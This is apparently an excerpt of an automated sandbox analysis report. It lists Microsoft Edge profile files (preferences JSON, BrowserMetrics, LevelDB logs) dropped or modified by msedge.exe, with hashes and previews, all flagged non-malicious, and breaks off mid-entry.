Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-673FA25A-9D4.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.2910283016050168
Encrypted:	false
SSDEEP:	1536:pmhERDUSpC+7IhMbyRG23bJJLQqqh/IXaOE7x9Mq9QG23:pCERASpx7oMb723bJJLQf6qOU9T9QG2
MD5:	17E3DF57B961053F01DA07F41032B203
SHA1:	ED77840F58CF7F6B0194CC4881CF6B2178392A2A
SHA-256:	FF1376136472AA5008C422D34688098A21E5023F91BD3236C482507001BF8EDA
SHA-512:	FDF3AB4D5D4A39799CE99D2AD4B3DBA952863C76C3403B5A772F4E7E97B8A0E48CE66A8AA2C20F1710C4CB2F688A15E9519D17AF0052230E54488B837F41E376
Malicious:	false
Preview:	...@..@...@.....C.].....@...............X...................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".jlwvtg20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(.....................$..<.w..U?:K.'D.I..G.......W6....{....>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-673FA26A-1F94.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.038984284250279395
Encrypted:	false
SSDEEP:	192:0Y0o3ZmP6rVZrJu4c4NgsXJiwk0foYhwNxwBIegTQcdARDin8y08Tcm2RGOdB:z0sZHHioJhwstCZ+O08T2RGOD
MD5:	D0819DB0577CC2AE9BDED97890108BF1
SHA1:	C63071CEB8309C7ACE037B0D17416DBA3CBBA2E4
SHA-256:	70A7BDD796247254417C93B81BB7B3C7361BEB71AAA34173C583F6A6D8587AEE
SHA-512:	336642A96894802716C6342A98761464272FF09981B996D13F24FAA41C4096BBA96887FBC8BA972113AFBA9DFAFFAFA9E4CA5C7BD9819D1FB0F5E6E06DDB4B6F
Malicious:	false
Preview:	...@..@...@.....C.].....@................^..pN..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".jlwvtg20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(..................... ..<.w..U'D.I..G.......W6....{....>.........."....."...2..."..:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...........................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-673FA28C-4E4.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.0313085443424715
Encrypted:	false
SSDEEP:	192:Nm0o3ZmP6rfZyJu4UZYXqhgrhBDhWOBVTflRQcxmOD+:k0sZkGcbhh3b4OD
MD5:	2BEA56221C52B4E84FEE81123E7C99D3
SHA1:	A4862AB221DB46F197191734C7D269C7E00421F2
SHA-256:	BC42D341FF5DEB95AD96510728609B16B630FDB4C3D5827736C826319B5754C8
SHA-512:	E84FA48865078C2DE72E6204C6A3E886532AB8CA4C81CC11C1B7EC8CB0888795FC9FD61D482024F4C82300D33C359E98FEA3C6033BBD4774F4F6CAB09635E433
Malicious:	false
Preview:	...@..@...@.....C.].....@................M..xL..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".jlwvtg20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(..................... ..<.w..U'D.I..G.......W6....{....>.........."....."...2..."..:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...........................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-673FA28D-1F80.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.027805344126750595
Encrypted:	false
SSDEEP:	192:TP0o3ZDP6r5Zp0Ju4JiYXqhgbE6hU4BVoUfO:L0sZS0uc/hN1
MD5:	972F050EF1EEFB8D18C30F007133F483
SHA1:	99AF020E4075FEB2B590D45C1C32C8746C369D95
SHA-256:	646CBED1A08365A0F8E784F77C190DA2989A570AE15657B79B793DA343C4CC8B
SHA-512:	DB81436FF3DDE02A506CE6B184CD237BC973046BD41B3CC02C0464C3E5009BAE088CBFD071FB7D0BF00B81EE718D958C0A941E24C03FC93A4E139ABE0F382D2E
Malicious:	false
Preview:	...@..@...@.....C.].....@................C.. C..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".jlwvtg20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(.....................$..<.w..U?:K.'D.I..G.......W6....{....>.........."....."...2..."..:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z.......................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	280
Entropy (8bit):	3.0461987566804245
Encrypted:	false
SSDEEP:	3:FiWWltlApdeXKe/wBVP/Sh/JzvPWVcRVEVg3WWD5gtl:o1ApdeaOwBVsJDu2ziy5gX
MD5:	7EFBF40B6F9FE36D9122EFA874A9EEFE
SHA1:	3FCF99E7505914A8EE21AC1A3373628E09D52197
SHA-256:	6B8B4B56501AAEEFB13D09FABEE345C17F4E31FA12998A97296773785956D040
SHA-512:	A3CCC4C472B0135F180418CE975CF97B42CB73B4C8361BDDFE322F8594AA32041D3DED8D925F1C384AB8CE61D26615D87C79C2D5FB4F7ADF24331B5892044AE2
Malicious:	false
Preview:	sdPC......................X..<EE..r/y...................................................................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\70daea48-dcec-4057-ac03-bac802da1acb.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\9c7fb058-bf3a-498c-ba7d-cb10bd174cd0.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25012
Entropy (8bit):	5.567399906177493
Encrypted:	false
SSDEEP:	768:DTvgsuWPKcfVQ8F1+UoAYDCx9Tuqh0VfUC9xbog/OVFUAVirw9pTtuG:DTvgsuWPKcfVQu1jac7VHvt1
MD5:	753D1929F220D7293269A53A6C825F10
SHA1:	E6592029A78018F6C6E392E47D2820A291F9AD02
SHA-256:	EF9C14C088AA439E2C960C0FFFDEA5723F201D051D7CB2069FC2BCCFA359B8DE
SHA-512:	EE63862EC91D38EFDE23594A2D34D07C3F3E187F0E9C312BBB02FF8A00C94A65BDA2E9B309BA332F5C6AA4329D21040C5B95E604913D5EE497C66DFEBF6A83F5
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376697181232775","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376697181232775","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	336
Entropy (8bit):	5.103101917965337
Encrypted:	false
SSDEEP:	6:HE98GKlyq2P923oH+Tcwt9Eh1tIFUt8YE98Wr1Zmw+YE98OujRkwO923oH+TcwtY:k98GGyv4Yeb9Eh16FUt8/98S/+/98OGQ
MD5:	ED80EADDF6038724AEE8DFDFBB14866C
SHA1:	69F918CDFFAEE259D70AAA92C7E174E277B9E347
SHA-256:	D476610007CEAD9B58EA5D13E0C0A8747315CC9AD6737C577535B5D83A41733E
SHA-512:	8500D2E639D5C66978684890943F3F0781C497CAF9FDBF51B4ED5C881F1825C3BBB929FF6600F2720558FAA01A9CED3E7CBE7ED206E74245C39F2891F5DDC7F8
Malicious:	false
Preview:	2024/11/21-16:13:12.751 1e70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/21-16:13:12.754 1e70 Recovering log #3.2024/11/21-16:13:12.759 1e70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.103101917965337
Encrypted:	false
SSDEEP:	6:HE98GKlyq2P923oH+Tcwt9Eh1tIFUt8YE98Wr1Zmw+YE98OujRkwO923oH+TcwtY:k98GGyv4Yeb9Eh16FUt8/98S/+/98OGQ
MD5:	ED80EADDF6038724AEE8DFDFBB14866C
SHA1:	69F918CDFFAEE259D70AAA92C7E174E277B9E347
SHA-256:	D476610007CEAD9B58EA5D13E0C0A8747315CC9AD6737C577535B5D83A41733E
SHA-512:	8500D2E639D5C66978684890943F3F0781C497CAF9FDBF51B4ED5C881F1825C3BBB929FF6600F2720558FAA01A9CED3E7CBE7ED206E74245C39F2891F5DDC7F8
Malicious:	false
Preview:	2024/11/21-16:13:12.751 1e70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/21-16:13:12.754 1e70 Recovering log #3.2024/11/21-16:13:12.759 1e70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	345
Entropy (8bit):	5.111284959803201
Encrypted:	false
SSDEEP:	6:HE98jSq2P923oH+TcwtnG2tMsIFUt8YE98jbZmw+YE98jxkwO923oH+TcwtnG2tF:k98+v4Yebn9GFUt8/98H/+/98V5LYebB
MD5:	3AF0CA35D542FAE541A1DE56120F99E0
SHA1:	697722652837B8752AA993ED989843FD8A9A9A07
SHA-256:	DAEDEA4C01F622B298EF86FB45C7578120048945F6F47BE38D75053D2AEA49E2
SHA-512:	0B2CE6F5E734E96FB19901D9DFE627F4BF28D6C849523EE6C34E7798533A606330A8265AB0016BA35D33E3BEFDF16CC11143518B0AA6B3B0FFC9561F551B5904
Malicious:	false
Preview:	2024/11/21-16:13:01.341 ee4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/21-16:13:01.341 ee4 Recovering log #3.2024/11/21-16:13:01.341 ee4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	345
Entropy (8bit):	5.111284959803201
Encrypted:	false
SSDEEP:	6:HE98jSq2P923oH+TcwtnG2tMsIFUt8YE98jbZmw+YE98jxkwO923oH+TcwtnG2tF:k98+v4Yebn9GFUt8/98H/+/98V5LYebB
MD5:	3AF0CA35D542FAE541A1DE56120F99E0
SHA1:	697722652837B8752AA993ED989843FD8A9A9A07
SHA-256:	DAEDEA4C01F622B298EF86FB45C7578120048945F6F47BE38D75053D2AEA49E2
SHA-512:	0B2CE6F5E734E96FB19901D9DFE627F4BF28D6C849523EE6C34E7798533A606330A8265AB0016BA35D33E3BEFDF16CC11143518B0AA6B3B0FFC9561F551B5904
Malicious:	false
Preview:	2024/11/21-16:13:01.341 ee4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/21-16:13:01.341 ee4 Recovering log #3.2024/11/21-16:13:01.341 ee4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	33
Entropy (8bit):	3.5394429593752084
Encrypted:	false
SSDEEP:	3:iWstvhYNrkUn:iptAd
MD5:	F27314DD366903BBC6141EAE524B0FDE
SHA1:	4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
SHA-256:	68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
SHA-512:	07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
Malicious:	false
Preview:	...m.................DB_VERSION.1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	311
Entropy (8bit):	5.168254554215612
Encrypted:	false
SSDEEP:	6:HE98oouM1923oH+Tcwtk2WwnvB2KLlVE98OBPjyq2P923oH+Tcwtk2WwnvIFUv:k98+hYebkxwnvFLs98GWv4YebkxwnQF2
MD5:	5C24B91912B76090E1694E1C5A127569
SHA1:	10764E3D0F142B367C8D60C7A7BDA4F844DF679F
SHA-256:	9AEDCABFD5D39ED34F5944FE62199D56310A222ABBD8C786C716058385E77910
SHA-512:	99A1C51E2CF61844B462C7A56C1BFD0379535F1180980F7DD8E9D5B6E6DA0CE881D350052F76252EDD43B4D619CDE5240BD5A7A4945BB9FC2751CACDC2077B68
Malicious:	false
Preview:	2024/11/21-16:13:12.739 1e94 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/11/21-16:13:12.765 1e94 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	380
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWW
MD5:	9FE07A071FDA31327FA322B32FCA0B7E
SHA1:	A3E0BAE8853A163C9BB55F68616C795AAAF462E8
SHA-256:	E02333C0359406998E3FED40B69B61C9D28B2117CF9E6C0239E2E13EC13BA7C8
SHA-512:	9CCE621CD5B7CFBD899ABCBDD71235776FF9FF7DEA19C67F86E7F0603F7B09CA294CC16B672B742FA9B51387B2F0A501C3446872980BCA69ADE13F2B5677601D
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.1061315007605
Encrypted:	false
SSDEEP:	6:HE98ORN4q2P923oH+Tcwt8aPrqIFUt8YE98RZmw+YE98LkwO923oH+Tcwt8amLJ:k98OL4v4YebL3FUt8/98R/+/98L5LYeo
MD5:	0CE1D4851C7555B629369AC56F49EF03
SHA1:	B9AED1809119B8D180AD7E86BEBE5C6006F18E02
SHA-256:	788A53DC796EEC7931AAD5BFCE2B10DED313FB799FB383C294D597FC66134AEA
SHA-512:	32A7CD594F456BC1D6AC1B71DA231BFE693D6268075D8BD6D53DD223BE3693C13A3E10B36FF5ABD513474898C0F6A1FED764CC035AFB7C0FBCEEECFCCDD11728
Malicious:	false
Preview:	2024/11/21-16:13:01.320 714 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/21-16:13:01.323 714 Recovering log #3.2024/11/21-16:13:01.323 714 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.1061315007605
Encrypted:	false
SSDEEP:	6:HE98ORN4q2P923oH+Tcwt8aPrqIFUt8YE98RZmw+YE98LkwO923oH+Tcwt8amLJ:k98OL4v4YebL3FUt8/98R/+/98L5LYeo
MD5:	0CE1D4851C7555B629369AC56F49EF03
SHA1:	B9AED1809119B8D180AD7E86BEBE5C6006F18E02
SHA-256:	788A53DC796EEC7931AAD5BFCE2B10DED313FB799FB383C294D597FC66134AEA
SHA-512:	32A7CD594F456BC1D6AC1B71DA231BFE693D6268075D8BD6D53DD223BE3693C13A3E10B36FF5ABD513474898C0F6A1FED764CC035AFB7C0FBCEEECFCCDD11728
Malicious:	false
Preview:	2024/11/21-16:13:01.320 714 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/21-16:13:01.323 714 Recovering log #3.2024/11/21-16:13:01.323 714 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	380
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWW
MD5:	9FE07A071FDA31327FA322B32FCA0B7E
SHA1:	A3E0BAE8853A163C9BB55F68616C795AAAF462E8
SHA-256:	E02333C0359406998E3FED40B69B61C9D28B2117CF9E6C0239E2E13EC13BA7C8
SHA-512:	9CCE621CD5B7CFBD899ABCBDD71235776FF9FF7DEA19C67F86E7F0603F7B09CA294CC16B672B742FA9B51387B2F0A501C3446872980BCA69ADE13F2B5677601D
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	325
Entropy (8bit):	5.148306293093424
Encrypted:	false
SSDEEP:	6:HE98Jq2P923oH+Tcwt865IFUt8YE98y9Zmw+YE98yPkwO923oH+Tcwt86+ULJ:k98Jv4Yeb/WFUt8/98y9/+/98yP5LYev
MD5:	7B287335B07322F80A09A112AB7EECAA
SHA1:	709C0CB44E7A19B4D212180B68AF68B9B819BC76
SHA-256:	E979DF14F98B67453125ED44894A768D7DEA1B997D1C3393EFEE898FB99C616C
SHA-512:	646165AF0A87C1F76B4BB406FD4B07E3F365816542B295837E0759989AFA2745688654BEA2CFF131D511D0AE9DD76ACEDD3ED51F40C99957F41F490D3E2157DD
Malicious:	false
Preview:	2024/11/21-16:13:01.379 714 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/21-16:13:01.391 714 Recovering log #3.2024/11/21-16:13:01.391 714 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	325
Entropy (8bit):	5.148306293093424
Encrypted:	false
SSDEEP:	6:HE98Jq2P923oH+Tcwt865IFUt8YE98y9Zmw+YE98yPkwO923oH+Tcwt86+ULJ:k98Jv4Yeb/WFUt8/98y9/+/98yP5LYev
MD5:	7B287335B07322F80A09A112AB7EECAA
SHA1:	709C0CB44E7A19B4D212180B68AF68B9B819BC76
SHA-256:	E979DF14F98B67453125ED44894A768D7DEA1B997D1C3393EFEE898FB99C616C
SHA-512:	646165AF0A87C1F76B4BB406FD4B07E3F365816542B295837E0759989AFA2745688654BEA2CFF131D511D0AE9DD76ACEDD3ED51F40C99957F41F490D3E2157DD
Malicious:	false
Preview:	2024/11/21-16:13:01.379 714 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/21-16:13:01.391 714 Recovering log #3.2024/11/21-16:13:01.391 714 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1140
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
MD5:	914FD8DC5F9A741C6947E1AB12A9D113
SHA1:	6529EFE14E7B0BEA47D78B147243096408CDAAE4
